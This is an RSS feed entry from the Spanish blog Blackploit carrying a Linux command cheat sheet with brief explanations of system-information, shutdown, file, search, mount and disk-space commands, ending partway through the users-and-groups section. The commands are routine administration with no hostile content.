<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2enclosuresfull.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:media="http://search.yahoo.com/mrss/" xmlns:creativeCommons="http://backend.userland.com/creativeCommonsRssModule" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><title>Blackploit [PenTest]</title><link>http://www.blackploit.com/</link><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/Hacking-blackploit" /><description>&lt;center&gt; 3l Conocimiento Debe Ser Libr3! &lt;/center&gt;</description><language>en</language><managingEditor>noreply@blogger.com (Zion3R)</managingEditor><lastBuildDate>Sun, 05 May 2013 10:54:46 PDT</lastBuildDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">543</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/">25</openSearch:itemsPerPage><feedburner:info uri="hacking-blackploit" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><media:category scheme="http://www.itunes.com/dtds/podcast-1.0.dtd">Religion &amp; Spirituality/Islam</media:category><creativeCommons:license>http://creativecommons.org/licenses/by/2.0/</creativeCommons:license><feedburner:emailServiceId>Hacking-blackploit</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><item><title>CheatSheet con 400 comandos para GNU/Linux que deberías saber</title><link>http://feedproxy.google.com/~r/Hacking-blackploit/~3/YiiibEDyb9g/cheatsheet-comandos-para-GNU-Linux.html</link><category>Tips</category><category>Trucos</category><category>Hack Tips</category><category>Linux OS</category><category>CheatSheet</category><category>GNU/Linux</category><author>noreply@blogger.com (Zion3R)</author><pubDate>Sat, 04 May 2013 15:42:04 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-4359390864582512854</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;b&gt;&lt;a href="http://2.bp.blogspot.com/-EUYxuN5JnJM/UYWMiIj5kMI/AAAAAAAAB_U/U6jV1p1mocg/s1600/linux.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="286" src="http://2.bp.blogspot.com/-EUYxuN5JnJM/UYWMiIj5kMI/AAAAAAAAB_U/U6jV1p1mocg/s640/linux.jpg" width="640" /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h2&gt;
Índice:&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;b&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#info" title="Información del Sistema"&gt;Información del Sistema&lt;/a&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#apagar" title="Apagar (Reiniciar o Cerrar Sesión)"&gt;Apagar (Reiniciar o Cerrar Sesión)&lt;/a&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#archi" title="Archivos y Directorios"&gt;&lt;b&gt;Archivos y Directorios&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#encontrar" title="Encontrar archivos"&gt;&lt;b&gt;Encontrar archivos&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#montar" title="Montando un sistema de ficheros"&gt;&lt;b&gt;Montando un sistema de ficheros&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#espacio" title="Montando un sistema de ficheros"&gt;&lt;b&gt;Espacio de Disco&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#usuarios" title="Usuarios y Grupos"&gt;&lt;b&gt;Usuarios y Grupos&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#pfiche" title="Permisos en Ficheros (Usa ”+” para colocar permisos y ”-” para eliminar)"&gt;&lt;b&gt;Permisos en Ficheros (Usa ”+” para colocar permisos y ”-” para eliminar)&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#afiche" title="Permisos en Ficheros (Usa ”+” para colocar permisos y ”-” para eliminar)"&gt;&lt;b&gt;Atributos especiales en ficheros (Usa ”+” para colocar permisos y ”-” para eliminar)&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#arfiche" title="Archivos y Ficheros comprimidos"&gt;&lt;b&gt;Archivos y Ficheros comprimidos&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#rpm" title="Paquetes RPM (Red Hat, Fedora y similares)"&gt;&lt;b&gt;Paquetes RPM (Red Hat, Fedora y similares)&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#yum" title="Actualizador de paquetes YUM (Red Hat, Fedora y similares)"&gt;&lt;b&gt;Actualizador de paquetes YUM (Red Hat, Fedora y similares)&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#deb" title="Paquetes Deb (Debian, Ubuntu y derivados)"&gt;&lt;b&gt;Paquetes Deb (Debian, Ubuntu y derivados)&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#apt" title="Actualizador de paquetes APT (Debian, Ubuntu y derivados)"&gt;&lt;b&gt;Actualizador de paquetes APT (Debian, Ubuntu y derivados)&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#cont" title="Ver el contenido de un fichero"&gt;&lt;b&gt;Ver el contenido de un fichero&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#texto" title="Manipulación de texto"&gt;&lt;b&gt;Manipulación de texto&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#estable" title="Establecer caracter y conversión de ficheros"&gt;&lt;b&gt;Establecer caracter y conversión de ficheros&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#analisis" title="Análisis del sistema de ficheros"&gt;&lt;b&gt;Análisis del sistema de ficheros&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#format" title="Formatear un sistema de ficheros"&gt;&lt;b&gt;Formatear un sistema de ficheros&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#swap" title="Trabajo con la SWAP"&gt;&lt;b&gt;Trabajo con la SWAP&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#backup" title="Salvas (Backup)"&gt;&lt;b&gt;Salvas (Backup)&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#cdrom" title="CD-ROM"&gt;&lt;b&gt;CD-ROM&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#red" title="Trabajo con la RED ( LAN y Wi-Fi)"&gt;&lt;b&gt;Trabajo con la RED (LAN y Wi-Fi)&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#samba" title="Redes de Microsoft Windows (SAMBA)"&gt;&lt;b&gt;Redes de Microsoft Windows (SAMBA)&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#iptable" title="Tablas IP (CORTAFUEGOS)"&gt;&lt;b&gt;Tablas IP (CORTAFUEGOS)&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#monitor" title="Tablas IP (CORTAFUEGOS)"&gt;&lt;b&gt;Monitoreando y depurando&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html#otros" title="Tablas IP (CORTAFUEGOS)"&gt;&lt;b&gt;Otros comandos útiles&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="info"&gt;&lt;/a&gt;&lt;a name='more'&gt;&lt;/a&gt;

&lt;div style="clear: both; text-align: center;"&gt;
&lt;script type="text/javascript"&gt;&lt;!--
google_ad_client = "ca-pub-7669852180477439";
/* 728 x 90 */
google_ad_slot = "5824550688";
google_ad_width = 728;
google_ad_height = 90;
//--&gt;
&lt;/script&gt;
&lt;script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt;
&lt;/script&gt;
&lt;/div&gt;


&lt;br /&gt;Información del sistema&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;arch&lt;/b&gt;: mostrar la arquitectura de la máquina (1).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;uname -m&lt;/b&gt;: mostrar la arquitectura de la máquina (2).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;uname -r&lt;/b&gt;: mostrar la versión del kernel usado.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dmidecode -q&lt;/b&gt;: mostrar los componentes (hardware) del sistema.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;hdparm -i /dev/hda&lt;/b&gt;: mostrar las características de un disco duro.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;hdparm -tT /dev/sda&lt;/b&gt;: realizar prueba de lectura en un disco duro.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cat /proc/cpuinfo&lt;/b&gt;: mostrar información de la CPU.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cat /proc/interrupts&lt;/b&gt;: mostrar las interrupciones.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cat /proc/meminfo&lt;/b&gt;: verificar el uso de memoria.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cat /proc/swaps&lt;/b&gt;: mostrar ficheros swap.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cat /proc/version&lt;/b&gt;: mostrar la versión del kernel.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cat /proc/net/dev&lt;/b&gt;: mostrar adaptadores de red y estadísticas.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cat /proc/mounts&lt;/b&gt;: mostrar el sistema de ficheros montado.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;lspci -tv&lt;/b&gt;: mostrar los dispositivos PCI.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;lsusb -tv&lt;/b&gt;: mostrar los dispositivos USB.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;date&lt;/b&gt;: mostrar la fecha del sistema.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cal 2011&lt;/b&gt;: mostrar el almanaque de 2011.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cal 07 2011&lt;/b&gt;: mostrar el almanaque para el mes julio de 2011.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;date 041217002011.00&lt;/b&gt;: colocar (declarar, ajustar) fecha y hora.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;clock -w&lt;/b&gt;: guardar los cambios de fecha en la BIOS.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="apagar"&gt;&lt;/a&gt;Apagar (Reiniciar Sistema o Cerrar Sesión)&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;shutdown -h now&lt;/b&gt;: apagar el sistema (1).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;init 0&lt;/b&gt;: apagar el sistema (2).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;telinit 0&lt;/b&gt;: apagar el sistema (3).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;halt&lt;/b&gt;: apagar el sistema (4).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;shutdown -h hours:minutes &amp;amp;&lt;/b&gt;: apagado planificado del sistema.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;shutdown -c&lt;/b&gt;: cancelar un apagado planificado del sistema.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;shutdown -r now&lt;/b&gt;: reiniciar (1).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;reboot&lt;/b&gt;: reiniciar (2).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;logout&lt;/b&gt;: cerrar sesión.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="archi"&gt;&lt;/a&gt;Archivos y Directorios&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cd /home&lt;/b&gt;: entrar en el directorio “home”.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cd ..&lt;/b&gt;: retroceder un nivel.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cd ../..&lt;/b&gt;: retroceder 2 niveles.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cd:&lt;/b&gt; ir al directorio raíz.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cd ~user1&lt;/b&gt;: ir al directorio user1.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cd -&lt;/b&gt;: ir (regresar) al directorio anterior.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;pwd&lt;/b&gt;: mostrar el camino del directorio de trabajo.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ls&lt;/b&gt;: ver los ficheros de un directorio.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ls -F&lt;/b&gt;: ver los ficheros de un directorio.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ls -l&lt;/b&gt;: mostrar los detalles de ficheros y carpetas de un directorio.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ls -a&lt;/b&gt;: mostrar los ficheros ocultos.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ls *[0-9]&lt;/b&gt;*: mostrar los ficheros y carpetas que contienen números.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;tree&lt;/b&gt;: mostrar los ficheros y carpetas en forma de árbol comenzando por la raíz.(1)&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;lstree&lt;/b&gt;: mostrar los ficheros y carpetas en forma de árbol comenzando por la raíz.(2)&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mkdir dir1&lt;/b&gt;: crear una carpeta o directorio con nombre ‘dir1?.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mkdir dir1 dir2&lt;/b&gt;: crear dos carpetas o directorios simultáneamente (Crear dos directorios a la vez).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mkdir -p /tmp/dir1/dir2&lt;/b&gt;: crear un árbol de directorios.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rm -f file1&lt;/b&gt;: borrar el fichero llamado ‘file1?.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rmdir dir1&lt;/b&gt;: borrar la carpeta llamada ‘dir1?.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rm -rf dir1&lt;/b&gt;: eliminar una carpeta llamada ‘dir1? con su contenido de forma recursiva. (Si lo borro recursivo estoy diciendo que es con su contenido).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rm -rf dir1 dir2&lt;/b&gt;: borrar dos carpetas (directorios) con su contenido de forma recursiva.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mv dir1 new_dir&lt;/b&gt;: renombrar o mover un fichero o carpeta (directorio).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cp file1&lt;/b&gt;: copiar un fichero.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cp file1 file2&lt;/b&gt;: copiar dos ficheros al unísono.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cp dir /* .&lt;/b&gt;: copiar todos los ficheros de un directorio dentro del directorio de trabajo actual.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cp -a /tmp/dir1 .&lt;/b&gt;: copiar un directorio dentro del directorio actual de trabajo.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cp -a dir1&lt;/b&gt;: copiar un directorio.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;cp -a dir1 dir2&lt;/b&gt;: copiar dos directorio al unísono.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ln -s file1 lnk1&lt;/b&gt;: crear un enlace simbólico al fichero o directorio.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ln file1 lnk1&lt;/b&gt;: crear un enlace físico al fichero o directorio.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;touch -t 0712250000 file1&lt;/b&gt;: modificar el tiempo real (tiempo de creación) de un fichero o directorio.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;file file1&lt;/b&gt;: salida (volcado en pantalla) del tipo mime de un fichero texto.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;iconv -l&lt;/b&gt;: listas de cifrados conocidos.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;iconv -f fromEncoding -t toEncoding inputFile &amp;gt; outputFile&lt;/b&gt;: crea una nueva forma del fichero de entrada asumiendo que está codificado en fromEncoding y convirtiéndolo a ToEncoding.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;find . -maxdepth 1 -name *.jpg -print -exec convert ”{}” -resize 80×60 “thumbs/{}” \;&lt;/b&gt;: agrupar ficheros redimensionados en el directorio actual y enviarlos a directorios en vistas de miniaturas (requiere convertir desde ImagemagicK).&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="encontrar"&gt;&lt;/a&gt;Encontrar archivos&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;find / -name file1&lt;/b&gt;: buscar fichero y directorio a partir de la raíz del sistema.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;find / -user user1&lt;/b&gt;: buscar ficheros y directorios pertenecientes al usuario ‘user1?.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;find /home/user1 -name \*.bin&lt;/b&gt;: buscar ficheros con extensión ‘. bin’ dentro del directorio ‘/ home/user1?.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;find /usr/bin -type f -atime +100&lt;/b&gt;: buscar ficheros binarios no usados en los últimos 100 días.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;find /usr/bin -type f -mtime -10&lt;/b&gt;: buscar ficheros creados o cambiados dentro de los últimos 10 días.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;find / -name \*.rpm -exec chmod 755 ‘{}’ \;&lt;/b&gt;: buscar ficheros con extensión ‘.rpm’ y modificar permisos.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;find / -xdev -name \*.rpm&lt;/b&gt;: Buscar ficheros con extensión ‘.rpm’ ignorando los dispositivos removibles como cdrom, pen-drive, etc.…&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;locate \*.ps&lt;/b&gt;: encuentra ficheros con extensión ‘.ps’ ejecutados primeramente con el command ‘updatedb’.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;whereis halt&lt;/b&gt;: mostrar la ubicación de un fichero binario, de ayuda o fuente. En este caso pregunta dónde está el comando ‘halt’.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;which halt&lt;/b&gt;: mostrar la senda completa (el camino completo) a un binario / ejecutable.&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="montar"&gt;&lt;/a&gt;Montando un sistema de ficheros&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mount /dev/hda2 /mnt/hda2&lt;/b&gt;: montar un disco llamado hda2. Verifique primero la existencia del directorio ‘/ mnt/hda2?; si no está, debe crearlo.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;umount /dev/hda2&lt;/b&gt;: desmontar un disco llamado hda2. Salir primero desde el punto ‘/ mnt/hda2.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;fuser -km /mnt/hda2&lt;/b&gt;: forzar el desmontaje cuando el dispositivo está ocupado.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;umount -n /mnt/hda2&lt;/b&gt;: correr el desmontaje sin leer el fichero /etc/mtab. Útil cuando el fichero es de solo lectura o el disco duro está lleno.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mount /dev/fd0 /mnt/floppy&lt;/b&gt;: montar un disco flexible (floppy).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mount /dev/cdrom /mnt/cdrom&lt;/b&gt;: montar un cdrom / dvdrom.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mount /dev/hdc /mnt/cdrecorder&lt;/b&gt;: montar un cd regrabable o un dvdrom.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mount /dev/hdb /mnt/cdrecorder&lt;/b&gt;: montar un cd regrabable / dvdrom (un dvd).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mount -o loop file.iso /mnt/cdrom&lt;/b&gt;: montar un fichero o una imagen iso.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mount -t vfat /dev/hda5 /mnt/hda5&lt;/b&gt;: montar un sistema de ficheros FAT32.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;mount /dev/sda1 /mnt/usbdisk&lt;/b&gt;: montar un usb pen-drive o una memoria (sin especificar el tipo de sistema de ficheros).&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="espacio"&gt;&lt;/a&gt;Espacio de Disco&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;df -h&lt;/b&gt;: mostrar una lista de las particiones montadas.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;ls -lSr |more&lt;/b&gt;: mostrar el tamaño de los ficheros y directorios ordenados por tamaño.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;du -sh dir1&lt;/b&gt;: Estimar el espacio usado por el directorio ‘dir1?.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;du -sk * | sort -rn&lt;/b&gt;: mostrar el tamaño de los ficheros y directorios ordenados por tamaño.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;rpm -q -a –qf ‘%10{SIZE}t%{NAME}n’ | sort -k1,1n&lt;/b&gt;: mostrar el espacio usado por los paquetes rpm instalados organizados por tamaño (Fedora, Redhat y otros).&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;dpkg-query -W -f=’${Installed-Size;10}t${Package}n’ | sort -k1,1n&lt;/b&gt;: mostrar el espacio usado por los paquetes instalados, organizados por tamaño (Ubuntu, Debian y otros).&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;
&lt;a href="http://www.blackploit.com/2013/05/cheatsheet-comandos-para-GNU-Linux.html" name="usuarios"&gt;&lt;/a&gt;Usuarios y Grupos&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;groupadd nombre_del_grupo&lt;/b&gt;: crear un nuevo grupo.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;b&gt;groupdel nombre_del_grupo&lt;/b&gt;: borrar un grupo.&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
